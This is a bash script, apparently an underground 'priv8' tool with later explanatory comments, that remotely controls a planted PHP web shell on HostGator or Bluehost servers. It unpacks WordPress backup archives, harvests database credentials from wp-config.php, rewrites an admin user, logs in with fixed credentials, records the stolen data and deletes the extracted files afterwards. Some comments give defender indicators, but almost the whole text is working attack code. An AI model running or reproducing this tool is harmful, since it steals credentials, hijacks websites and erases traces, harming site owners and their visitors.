- #!/bin/bash
- # Using ZeroShell V 1.3
- # ZeroByte.ID Priv8 Tools
- SHELL="http://victim/zeroshell-v.1.3.php";
- HOST=$(curl -s -d 'cmd=hostname' ${SHELL}"?ext=shellcmd" | sed "s|readonly>|\nHost: |g" | sed 's|</textarea>|\n|g' | grep 'Host:' | awk '{print $2}');
- FILENAME='wpconfig_'${HOST}'.txt';
- # wpdomain USER PASS DB HOST PREFIX
- # Sends database settings taken from a wp-config.php to the web shell in two
- # POSTs: ?grab=wp_options (the reply is searched for a "[DOMAIN]" line) and
- # ?grab=wp_users_updt (the reply is searched for "Record updated
- # successfully"). What the shell does server-side is not visible here; judging
- # by the endpoint names it reads the site URL and rewrites a wp_users record.
- # Side effects: appends to $FILENAME and wp_login.txt, writes
- # wp-logincookie.tmp, and sends a login POST to the site's wp-login.php.
- # Defender note: the login tried after a reported update is the fixed pair
- # zerobyte / id1337 (presumably what the shell writes into wp_users - not
- # shown on this page), so a wp_users row with that login, or a wp-login.php
- # POST carrying log=zerobyte, is an indicator of this tool.
- function wpdomain() {
- # Only '@' and '&' are percent-encoded; every other character is sent as-is.
- user=$(echo ${1} | sed 's/@/%40/g' | sed 's/&/%26/g');
- pass=$(echo ${2} | sed 's/@/%40/g' | sed 's/&/%26/g');
- db=$(echo ${3} | sed 's/@/%40/g' | sed 's/&/%26/g');
- host=$(echo ${4} | sed 's/@/%40/g' | sed 's/&/%26/g');
- tpref=$(echo ${5});
- # Keep only the line containing "DOMAIN" and strip the "[DOMAIN] " tag.
- DOMAIN=$(curl -s -d "wpuser="${user} -d "wppass="${pass} -d 'wpdb='${db} -d 'wphost='${host} -X POST ${SHELL}"?grab=wp_options" | grep 'DOMAIN' | sed 's|\[DOMAIN\] ||g');
- # Empty result: the shell returned no "[DOMAIN]" line for these settings.
- if [[ -z $DOMAIN ]];then
- echo '[i] Failed Grab Domain';
- else
- echo '[*] Domain: '$DOMAIN;
- echo '[*] Domain: '$DOMAIN >> $FILENAME;
- # Second request repeats the settings and adds the table prefix (tpfx).
- UPASCHG=$(curl -s -d "wpuser="${user} -d "wppass="${pass} -d 'wpdb='${db} -d 'wphost='${host} -d "tpfx="${tpref} -X POST ${SHELL}"?grab=wp_users_updt");
- if [[ ${UPASCHG} =~ 'Record updated successfully' ]];then
- # Append /wp-login.php; collapse the "//" produced when DOMAIN ends in "/".
- SITELOGIN=$(echo $DOMAIN'/wp-login.php' | sed 's|//wp-login.php|/wp-login.php|g');
- echo '[i] Try Login: '$SITELOGIN'|zerobyte|id1337'
- # Proceed only if the fetched page contains the string 'wp-submit'.
- if [[ $(curl -s $SITELOGIN) =~ 'wp-submit' ]];then
- # Login POST with the fixed credentials; cookies go to wp-logincookie.tmp.
- LOGIN=$(curl -s --cookie-jar wp-logincookie.tmp --data "log=zerobyte" --data "pwd=id1337" $SITELOGIN);
- # A reply containing 'login_error' is treated as a rejected login.
- if [[ ${LOGIN} =~ 'login_error' ]];then
- echo '[BAD] Login Failed';
- else
- echo '[OK] Login Successfully!';
- echo $SITELOGIN' user (zerobyte) pass (id1337)' >> wp_login.txt
- fi
- else
- echo '[BAD] Form Login Not Found!';
- fi
- else
- echo '[i] Failed Change User';
- fi
- fi
- }
- # miningblue PATH
- # Walks the web shell's directory listing under PATH, follows the link
- # labelled 'EXTRACT TO TMP' (apparently an archive-extraction action), fetches
- # wp-config.php from the extracted tree, parses the DB_* constants and the
- # table prefix, records them in $FILENAME and passes them to wpdomain.
- # The extracted directory is then removed through ?action=rmdir&file=, so the
- # temporary extraction is not expected to remain on the server afterwards.
- # Globals read: SHELL, FILENAME, and the counter i set by hostcheck.
- # Defender note: a hit here means a wp-config.php inside a readable archive
- # was returned to the client; the database password it contains should be
- # treated as disclosed.
- function miningblue() {
- # Number of "[D]" (directory) entries in the listing for PATH.
- CHK=$(curl -s ${SHELL}"?path="${1} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g' | wc -l);
- # Exactly one directory: process it directly, without the numbered loop.
- if [[ "$CHK" == "1" ]];then
- # Same listing again, this time keeping the directory's path.
- ASH=$(curl -s ${SHELL}"?path="${1} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- # First href on a line containing 'EXTRACT TO TMP'.
- GETGZ=$(curl -s ${SHELL}"?path="${ASH} | grep 'EXTRACT TO TMP' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne '-- Loading |:::';
- # POST extract=1 to that link; the path is taken from the 'EXTRACTED' line.
- DIRBUP=$(curl -s -d "extract=1" "${SHELL}${GETGZ}" | grep 'EXTRACTED' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- echo -ne ':::';
- # First directory link inside the extracted tree.
- DIRUSER=$(curl -s ${SHELL}"?path="${DIRBUP} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- # First link on a line mentioning wp-config.php in that directory.
- CONFDIR=$(curl -s ${SHELL}${DIRUSER} | grep 'wp-config.php' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- # Response is saved under a fixed local name, overwritten on every call.
- curl -s ${SHELL}${CONFDIR} > wp_config.php.temp;
- echo -ne ':::| 100%\n';
- # The PCRE lookbehinds match only the form 'NAME', 'value' (single quotes,
- # one space after the comma) and return the value part.
- WPUSER=$(cat wp_config.php.temp | grep -Po "(?<='(DB_USER'), ')[^']*");
- # NOTE(review): as rendered on this page the sed below replaces '&' with
- # '&' (a no-op); the paste may have lost an HTML entity here - cannot tell.
- WPPASS=$(cat wp_config.php.temp | grep -Po "(?<='(DB_PASSWORD'), ')[^']*" | sed 's|\&|\&|g');
- DBNAME=$(cat wp_config.php.temp | grep -Po "(?<='(DB_NAME'), ')[^']*");
- WPHOST=$(cat wp_config.php.temp | grep -Po "(?<='(DB_HOST'), ')[^']*");
- # Single-quoted text on the line that contains $table_prefix.
- TPREFX=$(cat wp_config.php.temp | grep '$table_prefix' | grep -Po "'\K.*?(?=')");
- # Nothing parsed: the saved response held no matching DB_USER definition.
- if [[ -z $WPUSER ]];then
- echo '-- FAILED GRAB CONFIG.';
- echo '';
- # A value that itself contains 'DB_USER' is treated as a bad parse: the
- # values are still printed and logged, but wpdomain is not called.
- elif [[ $WPUSER =~ 'DB_USER' ]]; then
- echo '[*] WP_User: '$WPUSER;
- echo '[*] WP_Pass: '$WPPASS;
- echo '[*] DB_Name: '$DBNAME;
- echo '[*] WP_Host: '$WPHOST;
- echo '[*] Table_Prefix: '$TPREFX;
- echo '[BAD] CONFIG FILE';
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- else
- echo '[*] WP_User: '$WPUSER;
- echo '[*] WP_Pass: '$WPPASS;
- echo '[*] DB_Name: '$DBNAME;
- echo '[*] WP_Host: '$WPHOST;
- echo '[*] Table_Prefix: '$TPREFX;
- # Parsed settings go to wpdomain before being appended to $FILENAME.
- wpdomain ${WPUSER} ${WPPASS} ${DBNAME} ${WPHOST} ${TPREFX}
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- fi
- ## DELBUP ##
- # Asks the shell to remove the extracted directory; the reply is discarded.
- curl -s ${SHELL}"?action=rmdir&file="$DIRBUP -o /dev/null;
- else
- # Zero or several directories: the same steps run once per listed entry.
- GRAB=$(curl -s ${SHELL}"?path="${1} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- count=0;
- for ASH in $(echo $GRAB)
- do
- # $[ ] is bash's older arithmetic-expansion syntax.
- count=$[count+1];
- # i is not set in this function; it is the loop counter from hostcheck.
- echo '['$i']['$count']';
- GETGZ=$(curl -s ${SHELL}"?path="${ASH} | grep 'EXTRACT TO TMP' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne '-- Loading |:::';
- DIRBUP=$(curl -s -d "extract=1" "${SHELL}${GETGZ}" | grep 'EXTRACTED' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- echo -ne ':::';
- DIRUSER=$(curl -s ${SHELL}"?path="${DIRBUP} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- CONFDIR=$(curl -s ${SHELL}${DIRUSER} | grep 'wp-config.php' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- curl -s ${SHELL}${CONFDIR} > wp_config.php.temp;
- echo -ne ':::| 100%\n';
- WPUSER=$(cat wp_config.php.temp | grep -Po "(?<='(DB_USER'), ')[^']*");
- WPPASS=$(cat wp_config.php.temp | grep -Po "(?<='(DB_PASSWORD'), ')[^']*" | sed 's|\&|\&|g');
- DBNAME=$(cat wp_config.php.temp | grep -Po "(?<='(DB_NAME'), ')[^']*");
- WPHOST=$(cat wp_config.php.temp | grep -Po "(?<='(DB_HOST'), ')[^']*");
- TPREFX=$(cat wp_config.php.temp | grep '$table_prefix' | grep -Po "'\K.*?(?=')");
- if [[ -z $WPUSER ]];then
- echo '-- FAILED GRAB CONFIG.';
- echo '';
- elif [[ $WPUSER =~ 'DB_USER' ]]; then
- echo '[*] WP_User: '$WPUSER;
- echo '[*] WP_Pass: '$WPPASS;
- echo '[*] DB_Name: '$DBNAME;
- echo '[*] WP_Host: '$WPHOST;
- echo '[*] Table_Prefix: '$TPREFX;
- echo '[BAD] CONFIG FILE';
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- else
- echo '[*] WP_User: '$WPUSER;
- echo '[*] WP_Pass: '$WPPASS;
- echo '[*] DB_Name: '$DBNAME;
- echo '[*] WP_Host: '$WPHOST;
- echo '[*] Table_Prefix: '$TPREFX;
- wpdomain ${WPUSER} ${WPPASS} ${DBNAME} ${WPHOST} ${TPREFX}
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- fi
- ## DELBUP ##
- curl -s ${SHELL}"?action=rmdir&file="$DIRBUP -o /dev/null;
- done
- fi
- }
- # mininggator PATH
- # Descends four levels of the web shell's directory listing starting at PATH
- # (HOME -> USRX -> PUBHTML -> PUBLICHTML), follows the 'EXTRACT TO TMP' link
- # it finds, fetches wp-config.php from the extracted tree, parses the DB_*
- # constants and table prefix, records them in $FILENAME and passes them to
- # wpdomain. The extracted directory is removed through ?action=rmdir&file=.
- # Globals read: SHELL, FILENAME, and the counter i set by hostcheck.
- # Defender note: the access-log pattern for one run is a burst of ?path=
- # listings, one POST to an extraction link, a fetch of wp-config.php and a
- # closing ?action=rmdir&file= request, all against the same script.
- function mininggator() {
- # Directory entries under PATH. This assignment overwrites the script's
- # HOME variable with the scraped listing.
- HOME=$(curl -s ${SHELL}"?path="${1} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- # Prints an empty string (no visible output).
- echo -ne '';
- USRX=$(curl -s ${SHELL}"?path="${HOME} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- echo -ne '';
- PUBHTML=$(curl -s ${SHELL}"?path="${USRX} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- echo -ne '';
- PUBLICHTML=$(curl -s ${SHELL}"?path="${PUBHTML} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- # No directories at the fourth level: look for the extraction link in the
- # PUBHTML listing itself and process it once.
- if [[ -z $PUBLICHTML ]];then
- # First href on a line containing 'EXTRACT TO TMP'.
- GETGZ=$(curl -s ${SHELL}"?path="${PUBHTML} | grep 'EXTRACT TO TMP' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne '-- Loading |:::';
- # POST extract=1 to that link; the path is taken from the 'EXTRACTED' line.
- DIRBUP=$(curl -s -d "extract=1" "${SHELL}${GETGZ}" | grep 'EXTRACTED' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- echo -ne ':::';
- # First directory link inside the extracted tree.
- DIRUSER=$(curl -s ${SHELL}"?path="${DIRBUP} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- # First link on a line mentioning wp-config.php in that directory.
- CONFDIR=$(curl -s ${SHELL}${DIRUSER} | grep 'wp-config.php' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- # Response is saved under a fixed local name, overwritten on every call.
- curl -s ${SHELL}${CONFDIR} > wp_config.php.temp;
- echo -ne ':::| 100%\n';
- # The PCRE lookbehinds match only the form 'NAME', 'value' (single quotes,
- # one space after the comma) and return the value part.
- WPUSER=$(cat wp_config.php.temp | grep -Po "(?<='(DB_USER'), ')[^']*");
- # NOTE(review): as rendered on this page the sed below replaces '&' with
- # '&' (a no-op); the paste may have lost an HTML entity here - cannot tell.
- WPPASS=$(cat wp_config.php.temp | grep -Po "(?<='(DB_PASSWORD'), ')[^']*" | sed 's|\&|\&|g');
- DBNAME=$(cat wp_config.php.temp | grep -Po "(?<='(DB_NAME'), ')[^']*");
- WPHOST=$(cat wp_config.php.temp | grep -Po "(?<='(DB_HOST'), ')[^']*");
- # Single-quoted text on the line that contains $table_prefix.
- TPREFX=$(cat wp_config.php.temp | grep '$table_prefix' | grep -Po "'\K.*?(?=')");
- # Nothing parsed: the saved response held no matching DB_USER definition.
- if [[ -z $WPUSER ]];then
- echo '-- FAILED GRAB CONFIG.';
- echo '';
- # A value that itself contains 'DB_USER' is treated as a bad parse: the
- # values are still printed and logged, but wpdomain is not called.
- elif [[ $WPUSER =~ 'DB_USER' ]]; then
- echo '[*] WP_User: '$WPUSER;
- echo '[*] WP_Pass: '$WPPASS;
- echo '[*] DB_Name: '$DBNAME;
- echo '[*] WP_Host: '$WPHOST;
- echo '[*] Table_Prefix: '$TPREFX;
- echo '[BAD] CONFIG FILE';
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- else
- echo '[*] WP_User: '$WPUSER;
- echo '[*] WP_Pass: '$WPPASS;
- echo '[*] DB_Name: '$DBNAME;
- echo '[*] WP_Host: '$WPHOST;
- echo '[*] Table_Prefix: '$TPREFX;
- # Parsed settings go to wpdomain before being appended to $FILENAME.
- wpdomain ${WPUSER} ${WPPASS} ${DBNAME} ${WPHOST} ${TPREFX}
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- fi
- # Asks the shell to remove the extracted directory; the reply is discarded.
- curl -s ${SHELL}"?action=rmdir&file="$DIRBUP -o /dev/null;
- else
- # Otherwise the same steps run once per fourth-level directory.
- count=0;
- for ASH in ${PUBLICHTML}
- do
- # $[ ] is bash's older arithmetic-expansion syntax.
- count=$[count+1];
- # i is not set in this function; it is the loop counter from hostcheck.
- echo '['$i']['$count']';
- GETGZ=$(curl -s ${SHELL}"?path="${ASH} | grep 'EXTRACT TO TMP' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne '-- Loading |:::';
- DIRBUP=$(curl -s -d "extract=1" "${SHELL}${GETGZ}" | grep 'EXTRACTED' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- echo -ne ':::';
- DIRUSER=$(curl -s ${SHELL}"?path="${DIRBUP} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- CONFDIR=$(curl -s ${SHELL}${DIRUSER} | grep 'wp-config.php' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- curl -s ${SHELL}${CONFDIR} > wp_config.php.temp;
- echo -ne ':::| 100%\n';
- WPUSER=$(cat wp_config.php.temp | grep -Po "(?<='(DB_USER'), ')[^']*");
- WPPASS=$(cat wp_config.php.temp | grep -Po "(?<='(DB_PASSWORD'), ')[^']*" | sed 's|\&|\&|g');
- DBNAME=$(cat wp_config.php.temp | grep -Po "(?<='(DB_NAME'), ')[^']*");
- WPHOST=$(cat wp_config.php.temp | grep -Po "(?<='(DB_HOST'), ')[^']*");
- TPREFX=$(cat wp_config.php.temp | grep '$table_prefix' | grep -Po "'\K.*?(?=')");
- if [[ -z $WPUSER ]];then
- echo '-- FAILED GRAB CONFIG.';
- echo '';
- elif [[ $WPUSER =~ 'DB_USER' ]]; then
- echo '[*] WP_User: '$WPUSER;
- echo '[*] WP_Pass: '$WPPASS;
- echo '[*] DB_Name: '$DBNAME;
- echo '[*] WP_Host: '$WPHOST;
- echo '[*] Table_Prefix: '$TPREFX;
- echo '[BAD] CONFIG FILE';
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- else
- echo '[*] WP_User: '$WPUSER;
- echo '[*] WP_Pass: '$WPPASS;
- echo '[*] DB_Name: '$DBNAME;
- echo '[*] WP_Host: '$WPHOST;
- echo '[*] Table_Prefix: '$TPREFX;
- wpdomain ${WPUSER} ${WPPASS} ${DBNAME} ${WPHOST} ${TPREFX}
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- fi
- ## DELBUP ##
- curl -s ${SHELL}"?action=rmdir&file="$DIRBUP -o /dev/null;
- done
- fi
- }
- # hostcheck
- # Picks the traversal routine from the hostname the web shell reported:
- # mininggator when $HOST contains 'hostgator.com', miningblue when it contains
- # 'bluehost.com'. Each whitespace-separated entry of the global USRJUMP is
- # passed to the chosen routine; i numbers the entries and is read by those
- # routines for their progress output.
- # Returns 1 when the hostname matches neither provider.
- function hostcheck() {
- if [[ $HOST =~ 'hostgator.com' ]];then
- echo '[SERVER] HOSTGATOR';
- i=0;
- # Unquoted expansion: USRJUMP is split on whitespace into one path per pass.
- for USR in $(echo $USRJUMP)
- do
- i=$[i+1];
- echo '['$i'] '$USR;
- mininggator $USR
- done
- elif [[ $HOST =~ 'bluehost.com' ]];then
- echo '[SERVER] BLUEHOST';
- i=0;
- for USR in $(echo $USRJUMP)
- do
- i=$[i+1];
- echo '['$i'] '$USR;
- miningblue $USR
- done
- else
- # Any other hostname: nothing is traversed.
- echo '[BAD] FAILED IDENTIFY HOST';
- return 1;
- fi
- }
- USRJUMP=$(curl -s ${SHELL}"?ext=backupwordpress" | grep -o '] <a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^] <a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- cat << "EOF"
- _ _ _ _
- _______ _ __ ___ | |__ _ _| |_ ___ (_) __| |
- |_ / _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
- / / __/ | | (_) | |_) | |_| | || __/_| | (_| |
- /___\___|_| \___/|_.__/ \__, |\__\___(_)_|\__,_|
- |___/
- :: BACKUPWORDPRESS CONFIG GRAB & AUTO EDIT USER ::
- EOF
- echo '[HOSTNAME] '$HOST;
- if [ -z "$USRJUMP" ];then
- echo "[BAD] FAILED GRAB!";
- else
- hostcheck
- fi